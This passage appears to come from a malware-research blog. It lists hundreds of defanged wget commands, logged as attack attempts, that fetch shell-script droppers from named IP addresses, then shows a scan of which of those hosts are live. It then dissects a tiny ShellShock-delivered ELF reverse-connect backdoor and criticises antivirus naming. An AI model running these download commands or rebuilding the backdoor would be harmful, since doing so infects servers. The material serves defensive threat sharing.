2016-01-06 09:56:04 | wget hxxp:// "freedomstress.com"/test/Binarys . sh
2016-01-06 09:41:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 09:31:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 08:31:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 08:21:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 07:40:31 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 07:23:01 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-06 07:10:37 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 05:49:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:40:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:29:56 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:29:55 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-06 05:23:13 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 05:13:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 04:51:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 04:41:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 04:20:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 03:22:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 03:21:23 | wget hxxp:// 5.196.249.163/IRC/loldongs . sh
2016-01-06 03:12:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 02:12:26 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-06 02:03:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:53:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:41:14 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 01:28:19 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-06 01:18:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 01:15:55 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-06 01:08:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 23:10:08 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-05 21:29:35 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-05 20:59:37 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-05 20:46:16 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 20:39:07 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 16:04:50 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 15:34:17 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 15:09:05 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 14:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 14:31:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 12:42:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 12:33:19 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 12:01:48 | wget hxxp:// 79.143.181.158/gtop . sh
2016-01-05 11:59:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 11:53:10 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 11:49:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 11:25:12 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 10:35:24 | wget hxxp:// 192.243.109.128/gtop . sh
2016-01-05 10:31:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 10:21:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 10:15:52 | wget hxxp:// 192.243.109.128/gtop . sh
2016-01-05 09:59:50 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 09:33:56 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 08:32:41 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-05 08:32:39 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-05 06:50:33 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 06:19:51 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 05:44:13 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 05:39:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 05:29:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:56:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:53:55 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 04:46:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 04:05:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 03:55:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 03:08:24 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 02:58:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 02:54:58 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-05 02:29:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 02:19:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 01:54:59 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 01:21:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-05 00:42:52 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-05 00:26:00 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-05 00:18:06 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 23:58:53 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:52:47 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:25:16 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 23:19:40 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 23:02:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 22:52:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 22:42:39 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 22:35:24 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 22:34:48 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 22:17:31 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-04 21:05:28 | wget hxxp:// 23.94.29.218/run . sh
2016-01-04 20:53:42 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 20:13:45 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 19:56:29 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 19:20:14 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 18:56:34 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 17:38:27 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 17:29:49 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 17:01:19 | wget hxxp:// 23.94.29.218/run . sh
2016-01-04 16:34:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 16:06:50 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 15:55:08 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 15:25:32 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 14:57:28 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 11:01:49 | wget hxxp:/64.20.33.134/gtop . sh
2016-01-04 09:11:33 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 08:38:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 08:29:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 08:26:16 | wget hxxp:// 45.32.232.197/gay/bin . sh
2016-01-04 08:16:25 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 07:50:23 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 07:36:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-04 07:36:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-04 07:13:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 07:03:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 03:39:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 03:29:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:34:18 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 02:28:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:18:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-04 02:03:32 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-04 01:21:29 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-04 00:52:14 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:27:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:25:27 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 23:16:17 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 23:13:08 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 23:01:48 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 21:49:37 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 21:32:14 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 21:26:59 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 21:23:59 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 20:58:00 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 20:32:31 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 20:18:47 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 19:17:24 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 19:05:51 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 18:51:01 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 18:20:47 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 12:40:30 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-03 12:14:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 12:04:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 10:42:45 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 10:31:57 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 10:20:26 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 09:25:51 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-03 09:03:19 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 08:31:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 08:11:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 08:01:24 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 07:57:40 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 07:17:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-03 07:17:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-03 06:31:16 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 06:12:38 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 06:01:00 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 05:55:18 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 05:20:40 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 05:06:29 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 04:59:35 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:57:56 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-03 04:52:15 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 04:23:22 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:18:00 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 04:16:34 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 03:55:01 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:49:30 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:32:56 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 03:25:28 | wget 93.171.158.242/rget . sh
2016-01-03 03:20:45 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 02:48:19 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 02:37:05 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-03 02:16:46 | wget hxxp:// 192.227.177.120/gtop . sh
2016-01-03 01:41:23 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 01:40:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 01:07:29 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-03 00:14:45 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-03 00:13:17 | wget hxxp:// 208.67.1.40/bin . sh
2016-01-03 00:05:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 23:16:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 22:59:48 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 17:36:24 | wget ftx://185.62.190.156/gtop . sh
2016-01-02 17:29:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 17:28:24 | wget ftx://185.62.190.156/gtop . sh
2016-01-02 17:19:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 14:57:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 14:47:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 11:36:27 | wget hxxp:// freedomstress.com/test/Binarys . sh
2016-01-02 11:18:28 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 11:03:35 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 09:17:34 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 09:17:33 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 08:59:56 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 08:42:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 08:17:15 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 08:12:53 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:55:07 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 07:39:18 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:28:20 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:10:25 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 07:07:38 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-02 06:27:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 06:17:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 04:40:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:36:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 04:32:52 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:26:31 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-02 04:16:45 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-02 04:05:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 03:55:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 03:46:59 | wget hxxp:// 198.12.97.93/Bot/stun . sh
2016-01-02 03:08:46 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 03:08:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-02 00:47:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 00:25:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-02 00:16:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 23:31:25 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 23:11:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 23:01:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:43:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:37:39 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 22:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-01 22:06:00 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 19:27:39 | wget hxxp:// 74.118.193.239/bin . sh
2016-01-01 10:10:31 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 09:59:17 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 09:20:34 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 08:55:03 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 08:24:38 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 08:20:48 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 08:13:49 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 08:08:20 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 07:04:44 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:54:15 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:44:01 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 06:30:49 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 06:24:57 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 06:00:52 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 05:08:34 | wget ftx:// 185.62.190.156/gtop . sh
2016-01-01 04:36:17 | wget hxxp:// 185.62.190.156/gtop . sh
2016-01-01 04:24:38 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 04:10:30 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 03:26:20 | wget hxxp:// 89.248.162.171/gtop . sh
2016-01-01 02:45:30 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 02:40:44 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-01 02:40:43 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-01 02:25:46 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 02:18:07 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-01 02:03:22 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 01:43:22 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 01:26:39 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 00:48:23 | wget hxxp:// 208.89.211.111/bin . sh
2016-01-01 00:31:20 | wget -q hxxp:// 198.23.238.203/tel . sh
2016-01-01 00:25:53 | wget ftx:// 208.67.1.52/Binarys . sh
2016-01-01 00:17:39 | wget hxxp:// 185.62.190.156/gtop . sh

6. Hosts up checked result (42 is up)

-----------------------------------------------------------------
UpChecked: 70 IP addresses (42 hosts up) scanned in 24.34 seconds
Sun Feb  7 12:37:12 #MalwareMustDie!
-----------------------------------------------------------------
Scan report for "biz.kcscleaning.net" (107.172.23.133)
    Host is up, received reset ttl 48 (0.14s latency).
Scan report for "212.ip-158-69-205.net" (158.69.205.212)
    Host is up, received echo-reply ttl 48 (0.22s latency).
Scan report for "211.ip-158-69-217.net" (158.69.217.211)
    Host is up, received echo-reply ttl 48 (0.22s latency).
Scan report for 162.208.8.203
    Host is up, received echo-reply ttl 53 (0.19s latency).
Scan report for 162.213.195.144
    Host is up, received echo-reply ttl 50 (0.16s latency).
Scan report for 173.208.196.202
    Host is up, received echo-reply ttl 49 (0.17s latency).
Scan report for 185.112.249.111
    Host is up, received echo-reply ttl 49 (0.28s latency).
Scan report for "no.rdns.sharkservers.net" (185.112.249.26)
    Host is up, received echo-reply ttl 49 (0.27s latency).
Scan report for 185.130.5.200
    Host is up, received timestamp-reply ttl 49 (0.28s latency).
Scan report for 185.17.30.239
    Host is up, received echo-reply ttl 50 (0.26s latency).
Scan report for "ip-9-253.dataclub.biz" (185.29.9.253)
    Host is up, received echo-reply ttl 47 (0.30s latency).
Scan report for "web.minsupport.net" (185.52.2.114)
    Host is up, received echo-reply ttl 52 (0.29s latency).
Scan report for "cacti.s42.voby.se" (185.62.189.11)
    Host is up, received echo-reply ttl 50 (0.26s latency).
Scan report for "www.AlphaNineVPS.com" (192.227.170.67)
    Host is up, received echo-reply ttl 46 (0.20s latency).
Scan report for 192.243.109.128
    Host is up, received echo-reply ttl 53 (0.20s latency).
Scan report for "198-12-97-67-host.enwebhost.net" (198.12.97.67)
    Host is up, received echo-reply ttl 51 (0.18s latency).
Scan report for "198-23-238-203-host.enwebhost.net" (198.23.238.203)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "198-23-238-215-host.enwebhost.net" (198.23.238.215)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "198-23-238-251-host.enwebhost.net" (198.23.238.251)
    Host is up, received echo-reply ttl 51 (0.17s latency).
Scan report for "watchhere.docadvices.com" (199.180.133.178)
    Host is up, received echo-reply ttl 46 (0.15s latency).
Scan report for "mail10.sipanhost.com" (199.231.184.237)
    Host is up, received echo-reply ttl 49 (0.22s latency).
Scan report for "lht194.cowanci.com" (206.72.207.194)
    Host is up, received echo-reply ttl 49 (0.20s latency).
Nmap scan report for 208.67.1.142
    Host is up, received echo-reply ttl 48 (0.19s latency).
Scan report for "sonypaio.com" (208.73.207.236)
    Host is up, received echo-reply ttl 49 (0.26s latency).
Scan report for "server6.lega-helplineservice.com" (208.89.211.111)
    Host is up, received echo-reply ttl 46 (0.18s latency).
Scan report for "server.iceybinary.com" (216.158.225.7)
    Host is up, received echo-reply ttl 51 (0.12s latency).
Scan report for 218.104.49.211
    Host is up, received echo-reply ttl 47 (0.091s latency).
Scan report for 23.227.163.110
    Host is up, received echo-reply ttl 55 (0.15s latency).
Scan report for "host142-136-14-31.serverdedicati.aruba.it" (31.14.136.142)
    Host is up, received echo-reply ttl 47 (0.31s latency).
Scan report for "45.32.232.197.vultr.com" (45.32.232.197)
    Host is up, received echo-reply ttl 48 (0.38s latency).
Scan report for 46.101.71.240
    Host is up, received echo-reply ttl 48 (0.28s latency).
Scan report for "test.interserver.net" (64.20.33.134)
    Host is up, received echo-reply ttl 49 (0.21s latency).
Scan report for 80.82.64.177
    Host is up, received echo-reply ttl 52 (0.35s latency).
Scan report for "no-reverse-dns-configured.com" (89.248.166.131)
    Host is up, received reset ttl 52 (0.36s latency).
Scan report for 94.102.53.144
    Host is up, received echo-reply ttl 52 (0.37s latency).
Scan report for "no-reverse-dns-configured.com" (94.102.63.136)
    Host is up, received echo-reply ttl 52 (0.34s latency).

Notes:

Thank you for the friends who contributed much for this data, and
the willing to share to prevent infections getting out of control.
God bless us all.

#MalwareMustDie!

Fear thou not; 
for I [am] with thee: be not dismayed; 
for I [am] thy God: I will strengthen thee; 
yea, I will help thee; 
yea, I will uphold thee with the right hand of my righteousness.

☩Isaiah 41:10  

Wednesday, February 3, 2016

MMD-0051-2016 - Debunking a tiny ELF remote backdoor (shellcode shellshock part 2)

The background

In September 2014 during the ShellShock exploitation was in the rush I analyzed a case (MMD-0027-2014) of an ELF dropped payload via ShellShock attack, with the details can be read in-->[here]

Today I found an interesting ELF x86-32 sample that was reported several hours back, the infection vector is also via ShellShock, the reporter seems not so sure whether the ELF binary is malicious or not..nor can he figure which kind of malware it is.. if it's malicious, so I decided to dissect it upon received the sample, hoping this information will help security community to use it as reference for the similar case.

The ELF binary looks like this:

It is a statically compiled 155 bytes ELF binary in Intel 32bit architecture, by the result of its compilation I can tell that was in a form of shellcode for linux compiled in C template on a GCC compiler.

Studying the sample

As I fond of shellcode myself as a hobby, seeing the hex and stripping the ELF header parts, I can see the shellcode inside started from 31 db f7 e3 53 43 53 6a 02 b0 66 ..until.. cd 80 ff e1.

Compared to the previous mentioned case, this shellcode is a way much shorter, could be part of something bigger that was cut to whatever purpose, or a partial module of the threat series, or it's just small. Anyhow I decided to check it out, and of course, with my beloved radare. Firing up, it looks plain and simple assembly as per below, as per disassembled which each opcodes correctly in 80386(x86-32) machine language:

In a glimpse, this shellcode looks the same to what we had before, but it is slightly different on several patys and again, shorter. So now all we have to do is to describe how dos it work.

Dissection of the evil opcodes

I breakdown the codes into its calls & processes, took a while of work and reading many syscall references, but it was all worth and the result is as per pictured below:

What it says from line number 3 to 25 (xref: 0x08048054 to 0x0804807a) in plain English is:
Firstly this ELF/shellcode part called the socket, set it with as internet connection used socket (PF_INET) to a certain IP address and port number (both are hard coded in hex, see the picture above), assuming the back connection is going to being made to the remote machine. I see the same procedure is used in same reverse-shell malware or some malicious shellcode itself. This part is happened more or less similar as previous case I reported and dissected in September 2014 (linked above).

However, the rest of the lines is the interesting point of this threat.

in 0x0804807c it strictly set the memory space (in the stack) to the value of 7, and this can be only mean that the stack setting(PROT_READ, PROT_WRITE, PROT_EXEC) flag is set to readable, writeable and executable ( xref: codes from 0x0804807e to 0x0804808d is all about this setting..called syscall sys_mmap2 w/def size 4096 and called syscall sys_mprotect..in C is similar to make a malloc() part).

Up to this point the badness is smelled stronger. The next codes will explain its bad activity very well. In 0x0804808f it restores the socket and then reads the data from the socket (ref 0x08048095 in executed syscall0x03 sys_read) and it's saved the data to the stack (which is read/write/exec-able now).
The described current process is up to 0x08048097 now (we are here). So, an explanation in better English up to this process is: this malware connects to the defined IP address and port and listened to what will be sent and save the sent data in the memory.

The next, the last code is in address 0x08048099 is a jump command to ecx register which contains the pointer to the saved data in she stack, Yes, which can also mean the execution of the whatever data saved in the allocated stack (memory).

In overall, in short; this backdoor is back-connecting to a hardcoded remote host, it listens to the connected socket and retrieving the data sent through it, and saved the data in the stack (memory), and to then it can execute whatever form of executable data sent to the infected host.
And all of these can be performed in a tiny-savvy-little 155 bytes ELF file we have, nasty is it? To be clear, it doesn't fetch any binary, it doesn't contain any shell. as engineer one should be precise in defining this malicious definition.

The implementation for this backdoor can be widely applied as component to many further form of badness if it s installed/sent to any successful compromised host. We'd better to take more attention awareness of these type of small and unusual ELF files inside of our system.

The most commonly imaginable follow-up scheme for this ELF infection is the injection of the shell binary (mostly an "sh" or "bash" file, etc) ELF binary via this backdoor. But that is not necessarily to be the shell binary. IT can be rootkit installer or further malicious shellcode.

The threat is already in the wild folks, before you yell me of the OPSEC I'd say awareness is a must too!!, there is no need to be hush hush about this matter which making our fellow sysadmins clueless (like a friend who got this in his server) and doesn't know much info about this threat. They are the ones who can lose their jobs for not knowing these details, They need to know the correct definition.

Behavior analysis

During the "run" process, sysadmins in any infected machine will see some operations triggered by the malware in the kernel space as per processed called below:

And of course, in this particular file, due to the stupidity of the lamer who copy-pasta and wrongly compiled its codes, the segmentation fault will occur for the obvious silly reason, which I will not explain in here for the security reason.

Naming of the malware

I must protest to antiviruses that was saying this is as a "downloader", since clearly there is no direct/undirect downloading codes in its binary. The correct fact is, a backdoor, with the malicious verdict of: a remote attacker is pushing via TCP the binary to be executed in the compromised machine via this backdoor .

Other antivirus products named this malware with "GetShell", ...umm..well... it is about okay, since "mostly" what will be pushed via this backdoor are shell binaries, but noted: this malware is NOT making any GET action to receive that binary, it is just sitting there connecting to an IP and waiting for the push. Moreover.. the payload itself doesn't have to be a shell binary either, could be a rootkit for example, or etc badness installer, and so on..

For those antivirus products that named this malware as "ShellLoader"..sorry, it is just too different in meaning, firstly, the binary is NOT loading anything except itself, and there is no single shell is loaded too, furthermore, there is a shellloader ELF malware which is operated differently to this one, let's not mixing them, and please, do not suggest a wrong assumption to your market or customers, educate them with real technical fact instead! Come on, you can do better than this!

Congratulations to ONE product who named this correctly, you did a good work! A hat tip!

Sometimes it takes efforts to explain what actual names for this malware :-)
FYI, this is only 155 bytes of codes, lesser of that size is in shellcode bytes, mustn't be that hard to be read, specially with a good resources, manpower and budget.

I am a field fellow, I work from IDC to IDC, servers to servers, even now, my mates are all sysadmins and I am one of them, a NIX admin for 20+ years experience now, and I know them very well. And UNIX sysadmins CAN NOT AFFORD TO MAKE ANY MISTAKE, and yes, we don't. Services and daemons work are depending on us. For us, everything related to an incident like this, is technical, and we depend and trust the technical outcome, like the names of the malware, is the first result we will see, and sysadmin's actions will be based on those names after AntiVirus scanned it (if they installed it), this is why some of us paying license fee to AntiVirus yearly, and they (AV) should not making wrong judgement nor just do a pattern matching checks only for naming a ELF malware, especially for this tiny small dangerous stuff!!

